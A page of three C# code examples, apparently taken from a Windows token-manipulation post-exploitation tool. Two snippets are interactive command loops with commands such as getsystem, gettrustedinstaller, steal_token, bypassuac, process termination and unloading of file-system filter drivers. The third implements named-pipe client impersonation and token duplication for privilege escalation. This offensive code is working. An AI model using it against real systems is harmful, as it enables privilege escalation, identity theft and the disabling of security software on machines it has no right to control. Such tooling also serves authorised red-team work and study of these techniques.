Beispiel #1
0
        internal void Run()
        {
            try
            {
                Console.Write(context);
                String input;
                if (activateTabs)
                {
                    input = console.ReadLine();
                }
                else
                {
                    input = Console.ReadLine();
                }

                switch (NextItem(ref input))
                {
                case "list_privileges":
                    if (GetProcessID(input, out processID, out command))
                    {
                        hProcess = kernel32.OpenProcess(Constants.PROCESS_QUERY_INFORMATION, false, (UInt32)processID);
                        Console.WriteLine("[*] Recieved Handle {0}", hProcess.ToInt64());
                    }
                    else
                    {
                        hProcess = Process.GetCurrentProcess().Handle;
                    }

                    kernel32.OpenProcessToken(hProcess, Constants.TOKEN_ALL_ACCESS, out currentProcessToken);
                    Tokens.EnumerateTokenPrivileges(currentProcessToken);
                    kernel32.CloseHandle(currentProcessToken);
                    break;

                case "set_privilege":
                    if (GetProcessID(input, out processID, out command))
                    {
                        hProcess = kernel32.OpenProcess(Constants.PROCESS_QUERY_INFORMATION, false, (UInt32)processID);
                        Console.WriteLine("[*] Recieved Handle {0}", hProcess.ToInt64());
                    }
                    else
                    {
                        hProcess = Process.GetCurrentProcess().Handle;
                    }

                    kernel32.OpenProcessToken(hProcess, Constants.TOKEN_ALL_ACCESS, out currentProcessToken);
                    Tokens.SetTokenPrivilege(ref currentProcessToken, command);
                    kernel32.CloseHandle(currentProcessToken);
                    break;

                case "list_processes":
                    users = Enumeration.EnumerateTokens(false);
                    Console.WriteLine("{0,-30}{1,-30}", "User", "ProcessID");
                    Console.WriteLine("{0,-30}{1,-30}", "-----", "---------");
                    foreach (String name in users.Keys)
                    {
                        Console.WriteLine("{0,-30}{1,-30}", name, users[name]);
                    }
                    break;

                case "list_processes_wmi":
                    users = Enumeration.EnumerateTokensWMI();
                    Console.WriteLine("{0,-30}{1,-30}", "User", "ProcessID");
                    Console.WriteLine("{0,-30}{1,-30}", "-----", "---------");
                    foreach (String name in users.Keys)
                    {
                        Console.WriteLine("{0,-30}{1,-30}", name, users[name]);
                    }
                    break;

                case "find_user_processes":
                    processes = Enumeration.EnumerateUserProcesses(false, input);
                    Console.WriteLine("{0,-30}{1,-30}", "ProcessID", "Name");
                    Console.WriteLine("{0,-30}{1,-30}", "---------", "----");
                    foreach (UInt32 pid in processes.Keys)
                    {
                        Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
                    }
                    break;

                case "find_user_processes_wmi":
                    processes = Enumeration.EnumerateUserProcessesWMI(input);
                    Console.WriteLine("{0,-30}{1,-30}", "ProcessID", "Name");
                    Console.WriteLine("{0,-30}{1,-30}", "---------", "----");
                    foreach (UInt32 pid in processes.Keys)
                    {
                        Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
                    }
                    break;

                case "list_user_sessions":
                    Enumeration.EnumerateInteractiveUserSessions();
                    break;

                case "getsystem":
                    GetSystem(input);
                    break;

                case "gettrustedinstaller":
                    GetTrustedInstaller(input);
                    break;

                case "steal_token":
                    StealToken(input);
                    break;

                case "bypassuac":
                    BypassUAC(input);
                    break;

                case "whoami":
                    Console.WriteLine("[*] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
                    break;

                case "reverttoself":
                    if (advapi32.RevertToSelf())
                    {
                        Console.WriteLine("[*] Reverted token to {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
                    }
                    else
                    {
                        Console.WriteLine("[-] RevertToSelf failed");
                    }
                    break;

                case "run":
                    Run(input);
                    break;

                case "exit":
                    System.Environment.Exit(0);
                    break;

                default:
                    Help();
                    break;
                }
                Console.WriteLine();
            }
            catch (Exception error)
            {
                Console.WriteLine(error.ToString());
            }
            finally
            {
            }
        }
Beispiel #2
0
        internal void Run()
        {
            try
            {
                Console.Write(context);
                String input;
                if (activateTabs)
                {
                    input = console.ReadLine();
                }
                else
                {
                    input = Console.ReadLine();
                }

                IntPtr tempToken = IntPtr.Zero;
                kernel32.OpenProcessToken(kernel32.GetCurrentProcess(), Constants.TOKEN_ALL_ACCESS, out IntPtr hToken);
                switch (NextItem(ref input))
                {
                case "info":
                    if (GetProcessID(input, out processID, out command) && OpenToken(processID, ref tempToken))
                    {
                        hToken = tempToken;
                    }
                    Console.WriteLine("");
                    CheckPrivileges.GetTokenUser(hToken);
                    Console.WriteLine("");
                    CheckPrivileges.GetTokenOwner(hToken);
                    Console.WriteLine("");
                    CheckPrivileges.GetTokenGroups(hToken);
                    Console.WriteLine("");
                    CheckPrivileges.GetElevationType(hToken, out Winnt._TOKEN_TYPE tokenType);
                    CheckPrivileges.PrintElevation(hToken);
                    break;

                case "list_privileges":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.EnumerateTokenPrivileges(hToken);
                    break;

                case "enable_privilege":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
                    break;

                case "disable_privilege":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
                    break;

                case "remove_privilege":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
                    break;

                case "nuke_privileges":
                    if (GetProcessID(input, out processID, out command))
                    {
                        if (OpenToken(processID, ref tempToken))
                        {
                            hToken = tempToken;
                        }
                        else
                        {
                            break;
                        }
                    }
                    Tokens.DisableAndRemoveAllTokenPrivileges(ref hToken);
                    break;

                case "terminate":
                    if (GetProcessID(input, out processID, out command))
                    {
                        IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_TERMINATE, false, (UInt32)processID);
                        if (IntPtr.Zero == hProcess)
                        {
                            Tokens.GetWin32Error("OpenProcess");
                            break;
                        }
                        Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
                        if (!kernel32.TerminateProcess(hProcess, 0))
                        {
                            Tokens.GetWin32Error("TerminateProcess");
                            break;
                        }
                        Console.WriteLine("[+] Process Terminated");
                    }
                    break;

                case "sample_processes":
                    users = Enumeration.EnumerateTokens(false);
                    Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
                    Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
                    foreach (String name in users.Keys)
                    {
                        Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName);
                    }
                    break;

                case "sample_processes_wmi":
                    users = Enumeration.EnumerateTokensWMI();
                    Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
                    Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
                    foreach (String name in users.Keys)
                    {
                        Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName);
                    }
                    break;

                case "find_user_processes":
                    processes = Enumeration.EnumerateUserProcesses(false, input);
                    Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
                    Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
                    foreach (UInt32 pid in processes.Keys)
                    {
                        Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
                    }
                    break;

                case "find_user_processes_wmi":
                    processes = Enumeration.EnumerateUserProcessesWMI(input);
                    Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
                    Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
                    foreach (UInt32 pid in processes.Keys)
                    {
                        Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
                    }
                    break;

                case "list_filters":
                    using (Filters filters = new Filters())
                    {
                        filters.First();
                        filters.Next();
                    }
                    break;

                case "list_filter_instances":
                    using (FilterInstance filterInstance = new FilterInstance(NextItem(ref input)))
                    {
                        filterInstance.First();
                        filterInstance.Next();
                    }
                    break;

                case "detach_filter":
                    Filters.FilterDetach(input);
                    break;

                case "unload_filter":
                    Filters.Unload(NextItem(ref input));
                    break;

                case "sessions":
                    Enumeration.EnumerateInteractiveUserSessions();
                    break;

                case "getsystem":
                    GetSystem(input, hToken);
                    break;

                case "gettrustedinstaller":
                    GetTrustedInstaller(input);
                    break;

                case "steal_token":
                    StealToken(input);
                    break;

                case "steal_pipe_token":
                    StealPipeToken(input);
                    break;

                case "bypassuac":
                    BypassUAC(input);
                    break;

                case "whoami":
                    Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
                    break;

                case "reverttoself":
                    String message = advapi32.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed";
                    Console.WriteLine(message);
                    break;

                case "run":
                    Run(input);
                    break;

                case "runpowershell":
                    RunPowerShell(input);
                    break;

                case "exit":
                    Environment.Exit(0);
                    break;

                case "help":
                    String item = NextItem(ref input);
                    if ("help" != item)
                    {
                        Help(item);
                    }
                    else
                    {
                        Help();
                    }
                    break;

                default:
                    Help();
                    break;
                }
                if (IntPtr.Zero != hToken)
                {
                    kernel32.CloseHandle(hToken);
                }
                Console.WriteLine();
            }
            catch (Exception error)
            {
                Console.WriteLine(error.ToString());
                Tokens.GetWin32Error("MainLoop");
            }
            finally
            {
            }
        }
Beispiel #3
0
        ////////////////////////////////////////////////////////////////////////////////
        ////////////////////////////////////////////////////////////////////////////////
        private static Boolean _GetPipeToken(String pipeName)
        {
            IntPtr hNamedPipe = IntPtr.Zero;

            try
            {
                hNamedPipe = kernel32.CreateNamedPipeA(pipeName, Winbase.OPEN_MODE.PIPE_ACCESS_DUPLEX, Winbase.PIPE_MODE.PIPE_TYPE_MESSAGE | Winbase.PIPE_MODE.PIPE_WAIT, 2, 0, 0, 0, IntPtr.Zero);
                if (IntPtr.Zero == hNamedPipe)
                {
                    Tokens.GetWin32Error("CreateNamedPipeA");
                    return(false);
                }
                Console.WriteLine("[+] Created Pipe {0}", pipeName);
                waitHandle.Set();

                if (!kernel32.ConnectNamedPipe(hNamedPipe, IntPtr.Zero))
                {
                    Tokens.GetWin32Error("ConnectNamedPipe");
                    return(false);
                }
                Console.WriteLine("[+] Connected to Pipe {0}", pipeName);


                Byte[] lpBuffer            = new Byte[128];
                UInt32 lpNumberOfBytesRead = 0;
                if (!kernel32.ReadFile(hNamedPipe, lpBuffer, 1, ref lpNumberOfBytesRead, IntPtr.Zero))
                {
                    Tokens.GetWin32Error("ReadFile");
                    return(false);
                }

                Console.WriteLine("[+] Read Pipe {0}", pipeName);

                if (!advapi32.ImpersonateNamedPipeClient(hNamedPipe))
                {
                    Tokens.GetWin32Error("ImpersonateNamedPipeClient");
                    return(false);
                }
                Console.WriteLine("[+] Impersonated Pipe {0}", pipeName);

                Winbase._SECURITY_ATTRIBUTES sa = new Winbase._SECURITY_ATTRIBUTES();
                sa.bInheritHandle       = false;
                sa.nLength              = (UInt32)Marshal.SizeOf(sa);
                sa.lpSecurityDescriptor = (IntPtr)0;


                if (!kernel32.OpenThreadToken(kernel32.GetCurrentThread(), Constants.TOKEN_ALL_ACCESS, false, out hToken))
                {
                    Tokens.GetWin32Error("OpenThreadToken");
                    return(false);
                }
                Console.WriteLine("[+] Thread Token 0x{0}", hToken.ToString("X4"));

                IntPtr phNewToken = new IntPtr();
                UInt32 result     = ntdll.NtDuplicateToken(hToken, Constants.TOKEN_ALL_ACCESS, IntPtr.Zero, true, Winnt._TOKEN_TYPE.TokenPrimary, ref phNewToken);
                if (IntPtr.Zero == phNewToken)
                {
                    result = ntdll.NtDuplicateToken(hToken, Constants.TOKEN_ALL_ACCESS, IntPtr.Zero, true, Winnt._TOKEN_TYPE.TokenImpersonation, ref phNewToken);
                    if (IntPtr.Zero == phNewToken)
                    {
                        Tokens.GetNtError("NtDuplicateToken", result);
                        return(false);
                    }
                }

                if (IntPtr.Zero != phNewToken)
                {
                    hToken = phNewToken;
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("[-] {0}", ex.Message);
                return(false);
            }
            finally
            {
                if (IntPtr.Zero != hNamedPipe)
                {
                    kernel32.DisconnectNamedPipe(hNamedPipe);
                    kernel32.CloseHandle(hNamedPipe);
                }
            }

            return(true);
        }